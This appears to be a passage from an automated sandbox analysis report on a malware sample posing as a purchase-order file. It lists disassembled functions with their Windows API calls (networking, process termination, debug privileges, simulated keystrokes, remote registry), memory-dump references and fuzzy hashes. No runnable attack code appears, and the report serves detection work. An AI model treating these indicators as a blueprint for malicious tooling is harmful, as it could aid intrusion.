                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00309B6F
                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00309B90
                        • WSAGetLastError.WSOCK32(00000000), ref: 00309B9F
                        • inet_ntoa.WSOCK32(?), ref: 00309C0C
                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00309C51
                        • _memmove.LIBCMT ref: 00309D10
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLast$_memmovehtonsinet_ntoaselect
                        • String ID:
                        • API String ID: 1718709218-0
                        • Opcode ID: 9520fbb5afe4df81f1e455c9db2f80dd8d25f3d89f5b7dbf41b038e86b858f58
                        • Instruction ID: a5137c2813ae8cc7e846f529f9b330dc7a9860ca68c3cebf1158c51979a840c3
                        • Opcode Fuzzy Hash: 9520fbb5afe4df81f1e455c9db2f80dd8d25f3d89f5b7dbf41b038e86b858f58
                        • Instruction Fuzzy Hash: D671BB71518200AFD711EF24DC95FABB7E8EB84714F204A2EF5569B2E2DB30D914CB92
                        Function 0031B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0031B204
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: b37345d2899d7ffe428b8b855c1855071c3151c7ebebf1b16ee01e659eb03471
                        • Instruction ID: 9f074a72b4e80ba8602bcb5d948e05fcd8959bbfb1ffc441820c78c765d99d0d
                        • Opcode Fuzzy Hash: b37345d2899d7ffe428b8b855c1855071c3151c7ebebf1b16ee01e659eb03471
                        • Instruction Fuzzy Hash: 2E51C334500204BFEF3A9F28CC89FDEBB68AB0E350F214515F965D61A1C7B1E9E49B50
                        Function 002CA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0032E9EA
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0032EA0B
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0032EA20
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0032EA3D
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0032EA64
                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0032EA6F
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0032EA8C
                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,002CA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0032EA97
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                        • String ID:
                        • API String ID: 1268354404-0
                        • Opcode ID: a21c009eb776704bc6e658b252d1237a4ffa2b45edebd103c8b0f119383cf756
                        • Instruction ID: d2437444d0882684916277a31046e4603c5dd57a6df0236bd5baaec5722ecccf
                        • Opcode Fuzzy Hash: a21c009eb776704bc6e658b252d1237a4ffa2b45edebd103c8b0f119383cf756
                        • Instruction Fuzzy Hash: C6518C71620209EFDB21CF69DC82FAA77B8BB08754F20461DF95697290D7B0EC90DB51
                        Function 002CF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 002CF737
                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 002CF77E
                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 0032EB55
                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0032E9A0,00000004,00000000,00000000), ref: 0032EBC1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ShowWindow
                        • String ID:
                        • API String ID: 1268545403-0
                        • Opcode ID: f49708288493d75c73150f580683e128748a167047407c8b6b5c53aba8a2c138
                        • Instruction ID: c5595ab9b3ca658bc58a5276883ff7aaad254a2d18cf8748183d5512fb6d5339
                        • Opcode Fuzzy Hash: f49708288493d75c73150f580683e128748a167047407c8b6b5c53aba8a2c138
                        • Instruction Fuzzy Hash: BE417D31238681EADBB64B389EC9F36FA9B6F05301F650A2DF05B46561C6B0A898C711
                        Function 002F7E6F Relevance: 13.6, APIs: 9, Instructions: 135filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002F7C0C: GetFileAttributesW.KERNEL32(?,002F6A7B), ref: 002F7C0D
                        • lstrcmpiW.KERNEL32(?,?), ref: 002F7ED2
                        • _wcscmp.LIBCMT ref: 002F7EEA
                        • MoveFileW.KERNEL32(?,?), ref: 002F7F03
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$AttributesFullMoveNamePath_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 4093841705-0
                        • Opcode ID: 5b62ecbc8222a14896515b1c179663aa77fa12ad1bff446360a77a0ee59b1bfe
                        • Instruction ID: 40eb2a7ae9faa312d2675a5e2659a1a1df4ff02816f5bd403cbdd0c6e4323ea5
                        • Opcode Fuzzy Hash: 5b62ecbc8222a14896515b1c179663aa77fa12ad1bff446360a77a0ee59b1bfe
                        • Instruction Fuzzy Hash: 6D411F7181421DAACF21EBA4DC45AEDF3BCAF08350F5045AAE605A3141EA349B99CFA4
                        Function 002ECDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002EE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 002EE158
                          • Part of subcall function 002EE138: GetCurrentThreadId.KERNEL32 ref: 002EE15F
                          • Part of subcall function 002EE138: AttachThreadInput.USER32(00000000,?,002ECDFB,?,00000001), ref: 002EE166
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE06
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002ECE23
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002ECE26
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE2F
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002ECE4D
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002ECE50
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 002ECE59
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002ECE70
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002ECE73
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 841d877850289c305ed6a15c6587528e7e7cc54a46c354dbbdbdbdea1ab1da03
                        • Instruction ID: 0c29ec0153f25c9b31985723b5d521132c41142e7f94a00e5f31f03f88eb3061
                        • Opcode Fuzzy Hash: 841d877850289c305ed6a15c6587528e7e7cc54a46c354dbbdbdbdea1ab1da03
                        • Instruction Fuzzy Hash: FB1104B1960618BFFB112F749C8EF6E3A2DDB08754FA10415F3806B0E0C9F26C519AA4
                        Function 0030C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: NULL Pointer assignment$Not an Object type
                        • API String ID: 0-572801152
                        • Opcode ID: afdb551472f2b6a89316266171621bcacab3612e4e9f8804d63fde3fda4f114e
                        • Instruction ID: aeab2614b69aaf5282ad5ea4ebe03fe12eb5d6676b29b8ea937a3b99e3559098
                        • Opcode Fuzzy Hash: afdb551472f2b6a89316266171621bcacab3612e4e9f8804d63fde3fda4f114e
                        • Instruction Fuzzy Hash: 20E1D171A11219ABDF11CFA8C8A1BEEB7B9EF08354F158229F945AB2C1D7709D41CB90
                        Function 00301BFA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                        • _wcstok.LIBCMT ref: 00301D6E
                        • _wcscpy.LIBCMT ref: 00301DFD
                        • _memset.LIBCMT ref: 00301E30
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                        • String ID: X$t:6p:6
                        • API String ID: 774024439-3365093800
                        • Opcode ID: f01cbf328309b3ea8c9387a2476b726b575e218b281cf027f6053ac537589a44
                        • Instruction ID: b648f30fa1294585ee47db297d7b1e4c92d84298b764c4b6cc5f69d194869f48
                        • Opcode Fuzzy Hash: f01cbf328309b3ea8c9387a2476b726b575e218b281cf027f6053ac537589a44
                        • Instruction Fuzzy Hash: B4C18C355187019FC315EF24C891AAAB7E4FF85350F10496DF89A9B2A2DB30ED15CF82
                        Function 00311AD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 163processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00311B09
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00311B17
                        • __wsplitpath.LIBCMT ref: 00311B45
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscat.LIBCMT ref: 00311B5A
                        • Process32NextW.KERNEL32(00000000,?), ref: 00311BD0
                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00311BE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                        • String ID: hE6
                        • API String ID: 1380811348-4214320467
                        • Opcode ID: 95b8ce97021a9334dd8b0db577a2ba20acca89ef7e57c8680978f7338f01451f
                        • Instruction ID: c52283fc5039dc4d82c4296d97c519513cff37f020e3e5266669a2ff4fa2e443
                        • Opcode Fuzzy Hash: 95b8ce97021a9334dd8b0db577a2ba20acca89ef7e57c8680978f7338f01451f
                        • Instruction Fuzzy Hash: C1517D71518300AFC325EF24C885EABB7ECEF88754F10491EF58597291EB70EA54CBA2
                        Function 00319882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00319926
                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0031993A
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00319954
                        • _wcscat.LIBCMT ref: 003199AF
                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003199C6
                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003199F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$Window_wcscat
                        • String ID: SysListView32
                        • API String ID: 307300125-78025650
                        • Opcode ID: 8c0bfb2955c671f89cefb1e0556ef869ef6c956db06245ce53d1478265003163
                        • Instruction ID: 59e271f8aba3cd8b1870095abfa5cc3271c37555f2ab98744900aa24510d0c90
                        • Opcode Fuzzy Hash: 8c0bfb2955c671f89cefb1e0556ef869ef6c956db06245ce53d1478265003163
                        • Instruction Fuzzy Hash: AF41AF71A00308ABEB269F64CC85BEE77A8EF0C350F11442AF599A7291C7719D848B60
                        Function 00311620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002F6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002F6F7D
                          • Part of subcall function 002F6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 002F6F8D
                          • Part of subcall function 002F6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002F7022
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0031168B
                        • GetLastError.KERNEL32 ref: 0031169E
                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003116CA
                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00311746
                        • GetLastError.KERNEL32(00000000), ref: 00311751
                        • CloseHandle.KERNEL32(00000000), ref: 00311786
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                        • String ID: SeDebugPrivilege
                        • API String ID: 2533919879-2896544425
                        • Opcode ID: 55d87082dbb0426fe847ad42df9b2ea2409cd8d49adb3d5eaf8b5c5c2090d9fa
                        • Instruction ID: 1a533beb99be667de522ebbc309693f4276fe692edd1d8a5dca98131d045ab2e
                        • Opcode Fuzzy Hash: 55d87082dbb0426fe847ad42df9b2ea2409cd8d49adb3d5eaf8b5c5c2090d9fa
                        • Instruction Fuzzy Hash: F341CE71610201AFDB1AEF64D8E1FADB7A5AF48744F098008FA065F3D2DB759844CF41
                        Function 002F6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000000,00007F03), ref: 002F62D6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconLoad
                        • String ID: blank$info$question$stop$warning
                        • API String ID: 2457776203-404129466
                        • Opcode ID: 35de5f07b2f0d11a7d2dbc7bb2cb9a963f13e98822831e0d046d77db1f4df315
                        • Instruction ID: 7ac091778b409901d020005dffde77c1d572b07c68d7eda762657ced8148b298
                        • Opcode Fuzzy Hash: 35de5f07b2f0d11a7d2dbc7bb2cb9a963f13e98822831e0d046d77db1f4df315
                        • Instruction Fuzzy Hash: C211A83132834BBED7065E64DC86DBEA39CDF167A4B10003BFE0166682E7F0AA614564
                        Function 002F757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 002F7595
                        • LoadStringW.USER32(00000000), ref: 002F759C
                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002F75B2
                        • LoadStringW.USER32(00000000), ref: 002F75B9
                        • _wprintf.LIBCMT ref: 002F75DF
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F75FD
                        Strings
                        • %s (%d) : ==> %s: %s %s, xrefs: 002F75DA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadModuleString$Message_wprintf
                        • String ID: %s (%d) : ==> %s: %s %s
                        • API String ID: 3648134473-3128320259
                        • Opcode ID: b24c014caf1dbeacb56e3a8890b9f4b3dafaa85c8513575987ca9bf70e443588
                        • Instruction ID: b7ed525c66a865739254a38c6080ccf5156241dd0afcfbce9199aa3d818b5609
                        • Opcode Fuzzy Hash: b24c014caf1dbeacb56e3a8890b9f4b3dafaa85c8513575987ca9bf70e443588
                        • Instruction Fuzzy Hash: 080136F6900208BFE752A7D4EDC9EF7776CD704301F4044A6B745E6051EA749E848B75
                        Function 00312A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312AE7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharConnectRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3479070676-0
                        • Opcode ID: 6e706b93f84833e6b27eb816d102750faadae14320a010ca28364e50d5e5c65e
                        • Instruction ID: 874fdd695b0ac3d3d4a978454253d381a8e242cac6623c2ff185f23577332d44
                        • Opcode Fuzzy Hash: 6e706b93f84833e6b27eb816d102750faadae14320a010ca28364e50d5e5c65e
                        • Instruction Fuzzy Hash: 43917B712142019FCB09EF14C891BAEB7E9FF88754F14881DF5969B2A1DB30E965CF82
                        Function 002DB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __mtinitlocknum.LIBCMT ref: 002DB744
                          • Part of subcall function 002D8A0C: __FF_MSGBANNER.LIBCMT ref: 002D8A21
                          • Part of subcall function 002D8A0C: __NMSG_WRITE.LIBCMT ref: 002D8A28
                          • Part of subcall function 002D8A0C: __malloc_crt.LIBCMT ref: 002D8A48
                        • __lock.LIBCMT ref: 002DB757
                        • __lock.LIBCMT ref: 002DB7A3
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00366948,00000018,002E6C2B,?,00000000,00000109), ref: 002DB7BF
                        • EnterCriticalSection.KERNEL32(8000000C,00366948,00000018,002E6C2B,?,00000000,00000109), ref: 002DB7DC
                        • LeaveCriticalSection.KERNEL32(8000000C), ref: 002DB7EC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                        • String ID:
                        • API String ID: 1422805418-0
                        • Opcode ID: 7ebedd8766e36d3586095f66c4159093ef8d7628101ce78c2a3c78e02d486780
                        • Instruction ID: 1710396a56c89d21ccd1ce5b661c6675a0b894a22daaaf2691b8ad05cbb45d7c
